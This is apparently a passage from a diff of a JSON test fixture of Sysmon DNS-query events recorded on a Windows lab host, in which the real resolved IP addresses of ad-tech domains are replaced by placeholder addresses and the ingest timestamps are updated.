Name='QueryName'\u003eappnexus-partners.tremorhub.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", @@ -13444,23 +13293,23 @@ "type": "CNAME" }, { - "data": "107.21.14.70", + "data": "89.160.20.156", "type": "A" }, { - "data": "107.23.33.163", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.22.192.59", + "data": "89.160.20.156", "type": "A" }, { - "data": "100.24.96.238", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13468,18 +13317,18 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "107.21.14.70", - "107.23.33.163", - "23.22.192.59", - "100.24.96.238", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { 
@@ -13496,19 +13345,16 @@ "x.dlx.addthis.com" ], "ip": [ - "107.21.14.70", - "107.23.33.163", - "23.22.192.59", - "100.24.96.238", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313911757Z", + "ingested": "2021-12-09T13:49:44.739744500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693044900Z'/\u003e\u003cEventRecordID\u003e156\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.531\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.dlx.addthis.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:107.21.14.70;::ffff:107.23.33.163;::ffff:23.22.192.59;::ffff:100.24.96.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693044900Z'/\u003e\u003cEventRecordID\u003e156\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.531\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.dlx.addthis.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", 
@@ -13576,15 +13422,15 @@ "type": "CNAME" }, { - "data": "18.205.112.71", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.40.146", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13592,7 +13438,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -13600,18 +13446,18 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" } ], "resolved_ip": [ - "18.205.112.71", - "50.19.40.146", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "network": { 
@@ -13628,19 +13474,18 @@ "dh.serving-sys.com" ], "ip": [ - "18.205.112.71", - "50.19.40.146", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313913085Z", + "ingested": "2021-12-09T13:49:44.739750500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693057200Z'/\u003e\u003cEventRecordID\u003e157\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.532\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edh.serving-sys.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:18.205.112.71;::ffff:50.19.40.146;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693057200Z'/\u003e\u003cEventRecordID\u003e157\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.532\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edh.serving-sys.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", 
@@ -13704,39 +13549,39 @@ "type": "CNAME" }, { - "data": "52.55.160.246", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.211.67.240", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.173.61.59", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.233.179.235", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.228.105.237", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.7.23.213", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.201.177.113", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.235.70.251", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13744,7 +13589,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -13753,17 +13598,17 @@ } ], "resolved_ip": [ - "52.55.160.246", - "3.211.67.240", - "35.173.61.59", - "34.233.179.235", - "34.228.105.237", - "52.7.23.213", - "52.201.177.113", - "34.235.70.251", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30" ] }, 
@@ -13780,24 +13625,17 @@ "match.sharethrough.com" ], "ip": [ - "52.55.160.246", - "3.211.67.240", - "35.173.61.59", - "34.233.179.235", - "34.228.105.237", - "52.7.23.213", - "52.201.177.113", - "34.235.70.251", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313914313Z", + "ingested": "2021-12-09T13:49:44.739756300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693070300Z'/\u003e\u003cEventRecordID\u003e158\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.534\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sharethrough.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
match-us-east-1.sharethrough.com;::ffff:52.55.160.246;::ffff:3.211.67.240;::ffff:35.173.61.59;::ffff:34.233.179.235;::ffff:34.228.105.237;::ffff:52.7.23.213;::ffff:52.201.177.113;::ffff:34.235.70.251;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693070300Z'/\u003e\u003cEventRecordID\u003e158\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.534\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sharethrough.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
match-us-east-1.sharethrough.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.693Z", @@ -13857,11 +13695,11 @@ }, "answers": [ { - "data": "35.241.16.233", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -13869,7 +13707,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -13877,7 +13715,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -13885,7 +13723,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -13893,7 +13731,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -13902,16 +13740,16 @@ } ], "resolved_ip": [ - "35.241.16.233", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, 
@@ -13927,23 +13765,23 @@ "tags.rd.linksynergy.com" ], "ip": [ - "35.241.16.233", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313915631Z", + "ingested": "2021-12-09T13:49:44.739762100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836591400Z'/\u003e\u003cEventRecordID\u003e159\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.601\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.rd.linksynergy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:35.241.16.233;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836591400Z'/\u003e\u003cEventRecordID\u003e159\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.601\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.rd.linksynergy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.836Z", @@ -14011,11 +13849,11 @@ "type": "CNAME" }, { - "data": "199.187.193.166", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -14023,7 +13861,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -14031,7 +13869,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -14039,19 +13877,19 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "199.187.193.166", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { 
@@ -14068,20 +13906,20 @@ "rtb-csync.smartadserver.com" ], "ip": [ - "199.187.193.166", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313916855Z", + "ingested": "2021-12-09T13:49:44.739768Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836608300Z'/\u003e\u003cEventRecordID\u003e160\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.604\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb-csync.smartadserver.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:199.187.193.166;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836608300Z'/\u003e\u003cEventRecordID\u003e160\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.604\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb-csync.smartadserver.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.836Z", 
@@ -14145,11 +13983,11 @@ "type": "CNAME" }, { - "data": "199.166.0.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -14157,7 +13995,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -14165,7 +14003,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -14173,7 +14011,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -14181,21 +14019,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "199.166.0.200", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
